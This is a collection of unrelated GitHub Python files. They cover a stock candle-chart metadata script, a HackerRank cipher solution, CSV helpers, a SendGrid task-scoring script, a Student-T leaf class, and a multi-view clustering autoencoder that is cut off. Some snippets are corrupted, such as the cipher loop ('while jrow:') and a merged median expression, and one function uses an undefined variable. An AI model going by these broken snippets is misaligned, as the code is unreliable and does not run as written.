datetime import datetime, timedelta\n\nimport pandas as pd\nfrom tqdm import tqdm\n\nfrom fin_app.utils.config import DataLocationConfig\nfrom fin_app.utils.logger import Logger\nfrom fin_app.data_processing.stockprice.candle_chart import creaet_candle_chart\nfrom fin_app.storage import S3\n\n\nTAG = 'create_candle_metadata'\n\n\ndef main():\n\n df_stocklist = pd.read_csv(\n DataLocationConfig.STOCKLIST_FILE\n )\n\n Logger.d(TAG, df_stocklist['銘柄コード'].unique())\n\n codes = df_stocklist['銘柄コード'].unique()\n\n STOCKPRICE_FILEPATH_FMT = 's3://fin-app/stockprice_concat/{code}.csv'\n\n METADATA_LOCAL_FILEPATH = '/tmp/DAILY_WINDOW-120d_STRIDE-30d_WIDTH-0.5_stockprice_metadata.csv'\n METADATA_S3_FILEPATH = os.path.join(\n DataLocationConfig.STOCKPRICE_CANDLECHART_BASEDIR.replace('s3://fin-app/', ''),\n f'metadata/DAILY_WINDOW-120d_STRIDE-30d_WIDTH-0.5/stockprice_metadata.csv'\n )\n\n s3_filepath_list = []\n start_dt_str_list = []\n end_dt_str_list = []\n code_list = []\n change_rate_list = []\n for code in tqdm(codes[:]):\n Logger.i(TAG, code)\n files = S3.get_filelist(\n basedir=os.path.join(\n DataLocationConfig.STOCKPRICE_CANDLECHART_BASEDIR.replace('s3://fin-app/', ''),\n # 'DAILY_WINDOW-120d_STRIDE-30d_WIDTH-0.5/1301'\n f'DAILY_WINDOW-120d_STRIDE-30d_WIDTH-0.5/{code}'\n )\n )\n start_dt_str = [file.split('/')[-1].replace('.png', '').split('_')[0] for file in files]\n end_dt_str = [file.split('/')[-1].replace('.png', '').split('_')[1] for file in files]\n\n s3_filepath_list += files\n start_dt_str_list += start_dt_str\n end_dt_str_list += end_dt_str\n code_list += [code]*len(files)\n\n Logger.i(TAG, f'len(files) : {len(files)}')\n Logger.i(TAG, f'len(s3_filepath_list) : {len(s3_filepath_list)}')\n\n try:\n df = pd.read_csv(\n STOCKPRICE_FILEPATH_FMT.format(code=code)\n )\n except Exception as e:\n Logger.e(TAG, f'failed to load csv file from s3 : {e}')\n change_rate_list += [None]*len(files)\n continue\n\n df['日付'] = pd.to_datetime(df['日付'])\n df = df.set_index('日付')\n df = df.rename(columns={\n '始値': 'open',\n '高値': 'high',\n '安値': 'low',\n '終値': 'close'\n })\n MAX_DT = df.index.max()\n\n for sds, eds in zip(start_dt_str, end_dt_str):\n if len(df[sds:eds]) == 0:\n change_rate_list.append(None)\n continue\n\n edt = datetime.strptime(eds, '%Y-%m-%d')\n for i in range(119):\n try:\n df.loc[edt]\n break\n except Exception:\n edt -= timedelta(days=1)\n continue\n #raise Exception('')\n change_rate_start_dt = edt + timedelta(days=1)\n change_rate_end_dt = change_rate_start_dt + timedelta(days=30)\n if change_rate_end_dt > MAX_DT or len(df[change_rate_start_dt:change_rate_end_dt]) == 0:\n change_rate_list.append(None)\n continue\n\n change_rate = \\\n (df[change_rate_start_dt:change_rate_end_dt]['close'] - df.loc[edt]['close']).mean() / \\\n df.loc[edt]['close']\n change_rate_list.append(change_rate)\n\n if code % 10 == 0:\n df_meta = pd.DataFrame({\n 's3_filepath': s3_filepath_list,\n 'code': code_list,\n 'start_dt': start_dt_str_list,\n 'end_dt': end_dt_str_list,\n 'change_rate_30d': change_rate_list,\n })\n df_meta.to_csv(\n METADATA_LOCAL_FILEPATH,\n index=None\n )\n Logger.i(TAG, f'len(df_meta) : {len(df_meta)}')\n\n df_meta = pd.DataFrame({\n 's3_filepath': s3_filepath_list,\n 'code': code_list,\n 'start_dt': start_dt_str_list,\n 'end_dt': end_dt_str_list,\n 'change_rate_30d': change_rate_list,\n })\n df_meta.to_csv(\n METADATA_LOCAL_FILEPATH,\n index=None\n )\n\n S3.save_file(\n local_filepath=METADATA_LOCAL_FILEPATH,\n s3_filepath=METADATA_S3_FILEPATH,\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"pondelion/FinAppBackend","sub_path":"batch/stockprice/create_candlechart_metadata.py","file_name":"create_candlechart_metadata.py","file_ext":"py","file_size_in_byte":4451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72655054510","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the encryption function below.\ndef encryption(s):\n n=len(s)\n row=round(math.sqrt(n))\n row=int(row)\n col=0\n if row>=math.sqrt(n):\n col=row\n else:\n col=row+1\n ans=[]\n for i in range(col):\n j=i\n word=\"\"\n while jrow:\n j+=row+1\n else:\n j+=row\n ans.append(word)\n return ' '.join(ans)\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n s = input()\n\n result = encryption(s)\n\n fptr.write(result + '\\n')\n\n fptr.close()\n","repo_name":"iFaiq19/Hackerrank","sub_path":"Algorithms/Python/Encryption/encryption.py","file_name":"encryption.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34792557822","text":"from csv import writer, DictWriter\nimport csv\nfrom posixpath import join\nimport datetime, shutil\n\n\ndef createBackup(fileName):\n shutil.copy(fileName, join(fileName, datetime.date, \".backup\"))\n\ndef deleteBlankRows(out, input):\n with open(input) as in_file:\n with open(out, 'w') as out_file:\n writer = csv.writer(out_file)\n for row in csv.reader(in_file):\n if any(field.strip() for field in row):\n writer.writerow(row)\n \n\ndef calcJulian(date):\n try:\n fmt='%m/%d/%Y'\n sdtdate = datetime.datetime.strptime(date, fmt)\n sdtdate = sdtdate.timetuple()\n jdate = sdtdate.tm_yday\n except:\n return None\n return(jdate)\n\ndef changeTimeFormat(date):\n try:\n s = date.split(\"-\")\n return (s[1] + \"/\" + s[2] + \"/\" + s[0])\n except:\n return None\n\n# the date parser for the arable format\ndef parseTime(date):\n try:\n t = date.replace('T', '/').split('/')\n return (t[0] + \"/\" + t[1] + \"/\" + t[3])\n except:\n try:\n t = date.replace('T', '-').split('-')\n return (t[1] + \"/\" + t[2] + \"/\" + t[0])\n except:\n return None\n\n\ndef hasData(input: list):\n defaultData = 2\n data = 0\n for i in input:\n if i != None:\n data+=1\n return True if data > defaultData else False\n\n\ndef append_list_as_row(file_name, list_of_elem):\n if list_of_elem == None or len(list_of_elem) == 0:\n return None\n # Open file in append mode\n with open(file_name, 'a+', newline='') as write_obj:\n # Create a writer object from csv module\n csv_writer = writer(write_obj)\n # Add contents of list as last row in the csv file\n csv_writer.writerow(list_of_elem)\n\ndef append_dict_as_row(file_name, dict_of_elem, allFieldNames):\n # Open file in append mode\n with open(file_name, 'a+', newline='') as write_obj:\n # Create a writer object from csv module\n dict_writer = DictWriter(write_obj, fieldnames=allFieldNames)\n # Add dictionary word to csv\n dict_writer.writerow(dict_of_elem)\n\n\n\n# if __name__ == \"__main__\":\n# v = parseTime(\"07/24T20:00:00/2021\")\n# print(v) \n# print(calcJulian(v))","repo_name":"C-Loftus/arable-data-automation","sub_path":"csvOperations.py","file_name":"csvOperations.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"27366457588","text":"# Reference: https://www.intercom.com/blog/rice-simple-prioritization-for-product-managers/\nimport json\nimport os\nfrom datetime import datetime\nfrom email.utils import parsedate_tz, mktime_tz\n\nfrom common.automator_client import client\n\n\ndef get_repo_name(url):\n split = url.rsplit('/', 3)\n return split[1]\n\n\ndef calculate_rice_reach(task):\n repo_to_reach_env_var = {\n 'sendgrid-python': 'TWILIO_SENDGRID_PYTHON_REACH',\n 'python-http-client': 'TWILIO_SENDGRID_PYTHON_REACH',\n 'sendgrid-php': 'TWILIO_SENDGRID_PHP_REACH',\n 'php-http-client': 'TWILIO_SENDGRID_PHP_REACH',\n 'sendgrid-csharp': 'TWILIO_SENDGRID_CSHARP_REACH',\n 'csharp-http-client': 'TWILIO_SENDGRID_CSHARP_REACH',\n 'sendgrid-java': 'TWILIO_SENDGRID_JAVA_REACH',\n 'java-http-client': 'TWILIO_SENDGRID_JAVA_REACH',\n 'sendgrid-nodejs': 'TWILIO_SENDGRID_NODEJS_REACH',\n 'nodejs-http-client': 'TWILIO_SENDGRID_NODEJS_REACH',\n 'sendgrid-ruby': 'TWILIO_SENDGRID_RUBY_REACH',\n 'ruby-http-client': 'TWILIO_SENDGRID_RUBY_REACH',\n 'sendgrid-go': 'TWILIO_SENDGRID_GO_REACH',\n 'rest': 'TWILIO_SENDGRID_GO_REACH'\n }\n reach_env_var = repo_to_reach_env_var.get(get_repo_name(task['url']), 'MAXIMUM_REACH')\n rice_reach = os.getenv(reach_env_var) or 0\n return float(rice_reach) + task['num_of_comments'] + task['num_of_reactions']\n\n\ndef calculate_rice_impact(task):\n if task['labels']:\n rice_impact = 1000\n if 'type: docs update' in task['labels']:\n rice_impact = 1\n if 'type: security' in task['labels']:\n rice_impact = 3\n if 'type: bug' in task['labels']:\n rice_impact = 3\n if 'type: twilio enhancement' in task['labels']:\n rice_impact = 2\n if 'type: sendgrid enhancement' in task['labels']:\n rice_impact = 2\n if 'type: community enhancement' in task['labels']:\n rice_impact = 1\n if 'type: getting started' in task['labels']:\n rice_impact = 2\n if 'type: question' in task['labels']:\n rice_impact = 1\n if task['task_type'] == 'pr':\n rice_impact = rice_impact + 1\n return rice_impact\n else:\n # This is unlabeled, we artificially inflate the\n # score in this case to ensure it's at the top to be processed first\n return 1000\n\n\ndef calculate_rice_confidence(task):\n rice_confidence = 1\n if task['language'] == 'go':\n rice_confidence = .8\n return rice_confidence\n\n\ndef calculate_rice_effort(task):\n if task['labels']:\n rice_effort = 0.0001\n if 'difficulty: easy' in task['labels']:\n rice_effort = 1\n if 'difficulty: medium' in task['labels']:\n rice_effort = 3\n if 'difficulty: hard' in task['labels']:\n rice_effort = 5\n if 'difficulty: very hard' in task['labels']:\n rice_effort = 8\n if 'difficulty: unknown or n/a' in task['labels']:\n rice_effort = .0001\n return rice_effort\n else:\n # This is unlabeled, we artificially inflate the\n # score in this case to ensure it's at the top to be processed first\n return .0001\n return rice_effort\n\n\ndef http_timestamp_to_datetime(http_timestamp):\n timestamp = mktime_tz(parsedate_tz(http_timestamp))\n return datetime.utcfromtimestamp(timestamp)\n\n\ndef needs_updating(task_id):\n task = get_task(task_id)\n if not task['updated_locally_at']:\n return True\n updated_at = http_timestamp_to_datetime(task['updated_at'])\n updated_locally_at = http_timestamp_to_datetime(task['updated_locally_at'])\n if updated_at > updated_locally_at:\n return True\n return False\n\n\ndef get_task(task_id):\n response = client.tasks._(task_id).get()\n task = json.loads(response.body)\n return task['message']\n\n\ndef get_tasks():\n response = client.tasks.get()\n tasks = json.loads(response.body)\n return tasks['message']['tasks']\n\n\ndef update_rice_score(task_id):\n if needs_updating(task_id):\n query_params = {\n \"reach\": calculate_rice_reach(task),\n \"impact\": calculate_rice_impact(task),\n \"confidence\": calculate_rice_confidence(task),\n \"effort\": calculate_rice_effort(task)\n }\n response = client.tasks.rice._(task_id).get(query_params=query_params)\n items = json.loads(response.body)\n return items\n return None\n\n\ntasks = get_tasks()\nfor task in tasks:\n update_rice_score(int(task[\"id\"]))\n","repo_name":"sendgrid/dx-automator","sub_path":"examples/update_rice_scores.py","file_name":"update_rice_scores.py","file_ext":"py","file_size_in_byte":4555,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"38"} +{"seq_id":"43322577325","text":"import numpy as np\nfrom math import gcd, ceil\n\ndef lcm(list_of_int):\n \"\"\"\n Get the Least Common Multyply (lcm) of a list of integer numbers.\n\n Parameters:\n --------\n list_of_int A List of integers\n Returns:\n --------\n An integer (the lcm of list_of_int).\n \"\"\"\n try:\n lcm = list_of_int[0]\n for i in list_of_int[1:]:\n lcm = lcm*i/gcd(int(lcm), i)\n return int(lcm)\n except IndexError:\n return None\n\ndef find_indices(lst, condition, xmin=0, xmax=0):\n # return [i for i, elem in enumerate(lst) if condition(elem)]\n # return [ _ for _ in itertools.compress(list(range(0,len(lst))), map(condition,lst)) ]\n return list(np.where((lst>=xmin) & (lst<=xmax))[0])\n\ndef find_inds_before_after(lst, el):\n inds_sm=find_indices(lst, lambda e: e<= el)\n if len(inds_sm):\n ind_before=inds_sm[-1]\n else:\n ind_before=-1\n inds_bi=find_indices(lst, lambda e: e>= el)\n if len(inds_bi):\n ind_after=inds_bi[0]\n else:\n ind_after=-1\n return (ind_before,ind_after)\n\ndef find_highest_point( x, y):\n x=np.asarray(x, dtype=np.float64)\n y=np.asarray(y, dtype=np.float64)\n if len(y):\n max_idx=np.argmax(y)\n return (x[max_idx],y[max_idx])\n else:\n return ()\n\ndef get_samples_for_pred_check(samples, func):\n # samples = np.asarray(samples)\n shape = samples.shape\n if 0 not in shape:\n if len(shape) == 1:\n axis = 0\n else:\n axis = 1\n if len(shape) > 2:\n fir_dim = shape[0]\n sec_dim = 1\n for i in np.arange(1,len(shape),1):\n sec_dim = sec_dim*shape[i]\n samples=samples.reshape(fir_dim,sec_dim)\n if func == \"min\":\n samples = samples.min(axis=axis)\n elif func == \"max\":\n samples = samples.max(axis=axis)\n elif func == \"mean\":\n samples = samples.mean(axis=axis)\n elif func == \"std\":\n samples = samples.std(axis=axis)\n else:\n samples = np.empty([1, 2])\n if ~np.isfinite(samples).all():\n samples = get_finite_samples(samples)\n else:\n samples = np.empty([1, 2])\n return samples\n\ndef get_finite_samples(np_array):\n if isinstance(np_array, np.ndarray):\n shape = len(np_array.shape)\n if shape == 1:\n np_array = np_array[np.isfinite(np_array)]\n elif shape > 1:\n samples_idx = np.isfinite(np_array).all(axis=shape-1)\n for axis in np.arange(shape-2,0,-1):\n samples_idx = np.isfinite(np_array).all(axis=axis)\n np_array = np_array[samples_idx]\n return np_array\n\ndef get_hist_bins_range(samples, func, var_type, ref_length = None, ref_values=None):\n \"\"\"\n Parameters:\n --------\n samples Flatten finite samples\n func Predictive check criterion {'min','max','mean','std'}\n var_type Variable type in {'Discrete','Continuous'}\n ref_length A reference length for bin to estimate the number of bins\n ref_values A numpy.ndarray with the unique values of a Discrete variable\n \"\"\"\n if func == 'min' or func == 'max' and var_type == \"Discrete\":\n if ref_values is not None:\n if len(ref_values)<20:\n min_v = ref_values.min()\n max_v = ref_values.max()\n bins = len(ref_values)\n if bins > 1:\n range = ( min_v, max_v + (max_v - min_v) / (bins - 1))\n else:\n range = ( min_v, min_v+1)\n return (bins, range)\n else:\n values = np.unique(samples)\n if len(values) < 20:\n min_v = values.min()\n max_v = values.max()\n bins = len(values)\n if bins > 1:\n range = ( min_v, max_v + (max_v - min_v) / (bins - 1))\n else:\n range = ( min_v, min_v+1)\n return (bins, range)\n range = (samples.min(),samples.max())\n if ref_length:\n bins = ceil((range[1] - range[0]) / ref_length)\n range = (range[0], range[0] + bins*ref_length)\n else:\n bins = 20\n return (bins, range)\n\ndef get_dim_names_options(dim):\n \"\"\"\n dim: imd.Dimension object\n \"\"\"\n name1 = dim.name\n name2 = None\n options1 = dim.values\n options2 = []\n if \"_idx_\" in name1:\n idx = name1.find(\"_idx_\")\n st_n1 = idx + 5\n end_n1 = len(name1)\n name2 = name1[st_n1:end_n1]\n name1 = name1[0:idx]\n values = np.array(dim.values)\n options1 = np.unique(values).tolist()\n if len(options1):\n tmp = np.arange(np.count_nonzero(values == options1[0]))\n options2 = list(map(str,tmp))\n return (name1, name2, options1, options2)\n\ndef get_w2_w1_val_mapping(dim):\n \"\"\"\n dim: imd.Dimension object\n Returns:\n -------\n A Dict {: A List of for this }\n \"\"\"\n options1 = dim.values\n values = np.array(dim.values)\n options1 = np.unique(values)\n val_dict = {}\n if len(options1):\n for v1 in options1:\n tmp = np.arange(np.count_nonzero(values == v1))\n val_dict[v1] = list(map(str,tmp))\n return val_dict\n\ndef get_stratum_range(samples, stratum):\n median = np.median(samples)\n if stratum == 0 or stratum == 1:\n inds_l = np.where(samples=median)[0]\n median_h = np.median(samples[inds_h])\n if stratum == 2:\n xmin = median\n xmax = median_h\n elif stratum == 3:\n xmin = median_h\n xmax = np.max(samples).item()\n else:\n xmin = np.min(samples).item()\n xmax = np.max(samples).item()\n return (xmin,xmax)","repo_name":"evdoxiataka/ipme","sub_path":"ipme/utils/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":6217,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"38"} +{"seq_id":"37518601137","text":"import tensorflow as tf\nfrom tensorflow_probability import distributions as tfd\nfrom libspn import utils, conf\nfrom libspn.graph.node import Node\nfrom libspn.graph.leaf.location_scale import LocationScaleLeaf\nfrom libspn.utils.initializers import Equidistant\nfrom libspn.utils.serialization import register_serializable\n\n\n@register_serializable\nclass StudentTLeaf(LocationScaleLeaf):\n\n \"\"\"A node representing uni-variate Student-T distributions for continuous input\n variables. Each variable will have *k* components. Each component has its\n own location (mean) and scale (standard deviation). These parameters can be learned or fixed.\n\n Lack of evidence must be provided explicitly through\n feeding :py:attr:`~libspn.StudentTLeaf.evidence`. By default, evidence is set to ``True``\n for all variables.\n\n Args:\n feed (Tensor): Tensor feeding this node or ``None``. If ``None``,\n an internal placeholder will be used to feed this node.\n num_vars (int): Number of random variables.\n num_components (int): Number of components per random variable.\n name (str): Name of the node\n loc_init (float or numpy.ndarray): If a float and there's no ``initialization_data``,\n all components are initialized with ``loc_init``. If\n an numpy.ndarray, must have shape\n ``[num_vars, num_components]``.\n scale_init (float): If a float and there's no ``initialization_data``, scales are\n initialized with ``variance_init``.\n trainable_loc (bool): Whether to make the location ``Variable`` trainable.\n trainable_scale (bool): Whether to make the scale ``Variable`` trainable.\n evidence_indicator_feed (Tensor): Tensor feeding this node's evidence indicator. If\n ``None``, an internal placeholder with default value will\n be created.\n \"\"\"\n\n def __init__(self, feed=None, num_vars=1, num_components=2, name=\"StudentTLeaf\",\n trainable_scale=True, trainable_loc=True,\n loc_init=Equidistant(), scale_init=1.0,\n min_scale=1e-2, evidence_indicator_feed=None, softplus_scale=False,\n trainable_df=False, df_init=tf.initializers.constant(1.0),\n share_locs_across_vars=False, share_scales=False, share_dfs=False):\n self._trainable_df = trainable_df\n self._df_init = df_init\n self._share_dfs = share_dfs\n\n super().__init__(\n feed=feed, evidence_indicator_feed=evidence_indicator_feed,\n num_vars=num_vars, num_components=num_components, trainable_loc=trainable_loc,\n trainable_scale=trainable_scale, loc_init=loc_init, scale_init=scale_init,\n min_scale=min_scale, softplus_scale=softplus_scale, name=name, dimensionality=1,\n share_locs_across_vars=share_locs_across_vars, share_scales=share_scales)\n\n def _create_dist(self):\n if self._softplus_scale:\n return tfd.StudentTWithAbsDfSoftplusScale(\n self._df_variable, self._loc_variable, self._scale_variable)\n return tfd.StudentT(self._df_variable, self._loc_variable, self._scale_variable)\n\n @utils.docinherit(Node)\n def _create(self):\n super()._create()\n with tf.variable_scope(self._name):\n # Initialize locations\n shape = self._variable_shape(\n 1 if self._share_dfs else self._num_vars,\n 1 if self._share_dfs else self._num_components,\n self._dimensionality)\n shape_kwarg = dict(shape=shape) if callable(self._df_init) else dict()\n self._df_variable = tf.get_variable(\n \"Df\", initializer=self._df_init, dtype=conf.dtype,\n trainable=self._trainable_df, **shape_kwarg)\n\n @property\n def variables(self):\n \"\"\"Returns mean and variance variables. \"\"\"\n return self._df_variable, self._loc_variable, self._scale_variable","repo_name":"pronobis/libspn","sub_path":"libspn/graph/leaf/student_t.py","file_name":"student_t.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"38"} +{"seq_id":"16998495562","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport math\n\nfrom pygooglechart import Chart\nfrom pygooglechart import SimpleLineChart\nfrom pygooglechart import XYLineChart\nfrom pygooglechart import Axis\n\ndef stripes():\n \n # Set the vertical range from 0 to 100\n max_y = 100\n\n # Chart size of 200x125 pixels and specifying the range for the Y axis\n chart = SimpleLineChart(600, 500, y_range=[0, max_y])\n\n # Add the chart data\n # data = [\n # 32, 34, 34, 32, 34, 34, 32, 32, 32, 34, 34, 32, 29, 29, 34, 34, 34, 37,\n # 37, 39, 42, 47, 50, 54, 57, 60, 60, 60, 60, 60, 60, 60, 62, 62, 60, 55,\n # 55, 52, 47, 44, 44, 40, 40, 37, 34, 34, 32, 32, 32, 31, 32\n # ]\n # data2 = [\n # 55, 52, 47, 44, 44, 40, 40, 37, 34, 34, 32, 32, 32, 31, 32, 62, 60, 55,\n # 32, 34, 34, 32, 34, 34, 32, 32, 32, 34, 34, 32, 29, 29, 34, 34, 34, 37, \n # 37, 39, 42, 47, 50, 54, 57, 60, 60, 60, 60, 60, 60, 60, 62\n # ] \n data = xrange(0, 100, 20)\n data2 = [0, 20, 20, 40, 40, 80, 80, 100, 100]\n chart.add_data(data)\n chart.add_data(data2)\n \n # Set the line colour to blue\n chart.set_colours(['0000FF','00CC00'])\n\n # Set the vertical stripes\n chart.fill_linear_stripes(Chart.CHART, 0, 'CCCCCC', 0.2, 'FFFFFF', 0.2)\n\n # Set the horizontal dotted lines\n chart.set_grid(0, 25, 5, 5)\n\n # The Y axis labels contains 0 to 100 skipping every 25, but remove the\n # first number because it's obvious and gets in the way of the first X\n # label.\n left_axis = range(0, max_y + 1, 25)\n left_axis[0] = ''\n chart.set_axis_labels(Axis.LEFT, left_axis)\n\n # X axis labels\n chart.set_axis_labels(Axis.BOTTOM, \\\n ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun'])\n\n chart.download('line-stripes.png')\n\ndef main():\n # simple_random()\n # xy_random()\n # xy_rect()\n # xy_circle()\n # sparklines()\n # fill()\n stripes()\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"meredith620/sentry","sub_path":"test/nchart/pchart.py","file_name":"pchart.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"7210868697","text":"from typing import List\n\nclass Solution:\n def findKthLargest(self, nums: List[int], k: int) -> int:\n def partition(begin: int, end: int) -> int:\n if begin >= end:\n return nums[begin]\n import random\n rand = random.randint(begin, end)\n nums[begin], nums[rand] = nums[rand], nums[begin]\n v = nums[begin]\n i, j = begin, end\n while i < j:\n while i < j and nums[j] <= v:\n j -= 1\n nums[i] = nums[j]\n while i < j and nums[i] >= v:\n i += 1\n nums[j] = nums[i]\n nums[i] = v\n if i + 1 == k:\n return v\n elif i + 1 < k:\n return partition(i + 1, end)\n else:\n return partition(begin, i - 1)\n return partition(0, len(nums) - 1)\n\nif __name__ == \"__main__\":\n nums = [int(num) for num in input().split()]\n k = int(input())\n solution = Solution()\n print(solution.findKthLargest(nums, k))","repo_name":"jiangshen95/PasaPrepareRepo","sub_path":"Leetcode100/leetcode100_python/KthLargestElementinanArray2.py","file_name":"KthLargestElementinanArray2.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72694637869","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 17 21:55:31 2019\r\n\r\n@author: Administrator\r\n\"\"\"\r\n# This is the code for our IJCAI paper:\r\n# J Wen, Z Zhang, Y Xu, B Zhang, L Fei, GS Xie,\r\n# CDIMC-net: Cognitive Deep Incomplete Multi-view Clustering Network, IJCAI, 2020.\r\n# Note 1: because of using the kmeans to reorder samples before training, the clustering performance is sensitive to the reoder to some extent.\r\n# Note 2: Selecting suitable parameters 'learning rate' and 'lambda(gamma)' for pre-training and fine-tuning is important.\r\n# If you find the code is useful, please cite our IJCAI paper.\r\n# If you find any problems, please contact Jie Wen via jiewen_pr@126.com\r\n\r\n\r\nfrom __future__ import print_function, division\r\nimport argparse\r\nimport numpy as np\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.metrics.cluster import normalized_mutual_info_score as nmi_score\r\nfrom sklearn.metrics import adjusted_rand_score as ari_score\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom torch.nn.parameter import Parameter\r\nfrom torch.optim import Adam,SGD\r\nfrom torch.utils.data import DataLoader\r\nfrom torch.nn import Linear\r\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler,normalize\r\nimport scipy.io\r\n#from utils import MnistDataset, cluster_acc,load_mnist\r\nfrom idecutils import cluster_acc\r\nimport idecutils\r\nimport h5py\r\nimport csv\r\nfrom sklearn import manifold, datasets\r\nimport matplotlib.pyplot as plt\r\nimport os\r\n\r\nimport random\r\n#os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"7\" \r\ndef wmse_loss(input, target, weight, reduction='mean'):\r\n ret = (torch.diag(weight).mm(target - input)) ** 2\r\n ret = torch.mean(ret)\r\n return ret\r\ndef get_kNNgraph2(data,K_num):\r\n # each row of data is a sample\r\n \r\n x_norm = np.reshape(np.sum(np.square(data), 1), [-1, 1]) # column vector\r\n x_norm2 = np.reshape(np.sum(np.square(data), 1), [1, -1]) # column vector\r\n dists = x_norm - 2 * np.matmul(data, np.transpose(data))+x_norm2\r\n num_sample = data.shape[0]\r\n graph = np.zeros((num_sample,num_sample),dtype = np.int)\r\n for i in range(num_sample):\r\n distance = dists[i,:]\r\n small_index = np.argsort(distance)\r\n graph[i,small_index[0:K_num]] = 1\r\n graph = graph-np.diag(np.diag(graph))\r\n resultgraph = np.maximum(graph,np.transpose(graph))\r\n return resultgraph\r\nclass AE(nn.Module):\r\n\r\n def __init__(self, n_stacks,n_input, n_z):\r\n super(AE, self).__init__()\r\n dims0 = []\r\n for idim in range(n_stacks-2):\r\n linshidim=round(n_input[0]*0.8)\r\n linshidim = int(linshidim)\r\n dims0.append(linshidim)\r\n linshidim = 1500\r\n linshidim = int(linshidim)\r\n dims0.append(linshidim)\r\n \r\n dims1 = []\r\n for idim in range(n_stacks-2):\r\n linshidim=round(n_input[1]*0.8)\r\n linshidim = int(linshidim)\r\n dims1.append(linshidim)\r\n linshidim = 1500\r\n linshidim = int(linshidim)\r\n dims1.append(linshidim) \r\n \r\n dims2 = []\r\n for idim in range(n_stacks-2):\r\n linshidim=round(n_input[2]*0.8)\r\n linshidim = int(linshidim)\r\n dims2.append(linshidim)\r\n linshidim = 1500\r\n linshidim = int(linshidim)\r\n dims2.append(linshidim) \r\n \r\n dims3 = []\r\n for idim in range(n_stacks-2):\r\n linshidim=round(n_input[3]*0.8)\r\n linshidim = int(linshidim)\r\n dims3.append(linshidim)\r\n linshidim = 1500\r\n linshidim = int(linshidim)\r\n dims3.append(linshidim)\r\n \r\n dims4 = []\r\n for idim in range(n_stacks-2):\r\n linshidim=round(n_input[4]*0.8)\r\n linshidim = int(linshidim)\r\n dims4.append(linshidim)\r\n linshidim = 1500\r\n linshidim = int(linshidim)\r\n dims4.append(linshidim)\r\n \r\n # encoder0\r\n self.enc0_1 = Linear(n_input[0], dims0[0])\r\n self.enc0_2 = Linear(dims0[0], dims0[1])\r\n self.enc0_3 = Linear(dims0[1], dims0[2])\r\n self.z0_layer = Linear(dims0[2], n_z)\r\n # encoder1\r\n self.enc1_1 = Linear(n_input[1], dims1[0])\r\n self.enc1_2 = Linear(dims1[0], dims1[1])\r\n self.enc1_3 = Linear(dims1[1], dims1[2])\r\n self.z1_layer = Linear(dims1[2], n_z)\r\n # encoder2\r\n self.enc2_1 = Linear(n_input[2], dims2[0])\r\n self.enc2_2 = Linear(dims2[0], dims2[1])\r\n self.enc2_3 = Linear(dims2[1], dims2[2])\r\n self.z2_layer = Linear(dims2[2], n_z)\r\n # encoder3\r\n self.enc3_1 = Linear(n_input[3], dims3[0])\r\n self.enc3_2 = Linear(dims3[0], dims3[1])\r\n self.enc3_3 = Linear(dims3[1], dims3[2])\r\n self.z3_layer = Linear(dims3[2], n_z) \r\n # encoder4\r\n self.enc4_1 = Linear(n_input[4], dims4[0])\r\n self.enc4_2 = Linear(dims4[0], dims4[1])\r\n self.enc4_3 = Linear(dims4[1], dims4[2])\r\n self.z4_layer = Linear(dims4[2], n_z) \r\n \r\n \r\n # decoder0\r\n self.dec0_0 = Linear(n_z, n_z)\r\n self.dec0_1 = Linear(n_z, dims0[2])\r\n self.dec0_2 = Linear(dims0[2], dims0[1])\r\n self.dec0_3 = Linear(dims0[1], dims0[0])\r\n self.x0_bar_layer = Linear(dims0[0], n_input[0])\r\n # decoder1\r\n self.dec1_0 = Linear(n_z, n_z) \r\n self.dec1_1 = Linear(n_z, dims1[2])\r\n self.dec1_2 = Linear(dims1[2], dims1[1])\r\n self.dec1_3 = Linear(dims1[1], dims1[0])\r\n self.x1_bar_layer = Linear(dims1[0], n_input[1])\r\n # decoder2\r\n self.dec2_0 = Linear(n_z, n_z) \r\n self.dec2_1 = Linear(n_z, dims2[2])\r\n self.dec2_2 = Linear(dims2[2], dims2[1])\r\n self.dec2_3 = Linear(dims2[1], dims2[0])\r\n self.x2_bar_layer = Linear(dims2[0], n_input[2]) \r\n # decoder3\r\n self.dec3_0 = Linear(n_z, n_z) \r\n self.dec3_1 = Linear(n_z, dims3[2])\r\n self.dec3_2 = Linear(dims3[2], dims3[1])\r\n self.dec3_3 = Linear(dims3[1], dims3[0])\r\n self.x3_bar_layer = Linear(dims3[0], n_input[3])\r\n # decoder4\r\n self.dec4_0 = Linear(n_z, n_z) \r\n self.dec4_1 = Linear(n_z, dims4[2])\r\n self.dec4_2 = Linear(dims4[2], dims4[1])\r\n self.dec4_3 = Linear(dims4[1], dims4[0])\r\n self.x4_bar_layer = Linear(dims4[0], n_input[4]) \r\n \r\n def forward(self, x0,x1,x2,x3,x4,we):\r\n # encoder0\r\n enc0_h1 = F.relu(self.enc0_1(x0))\r\n enc0_h2 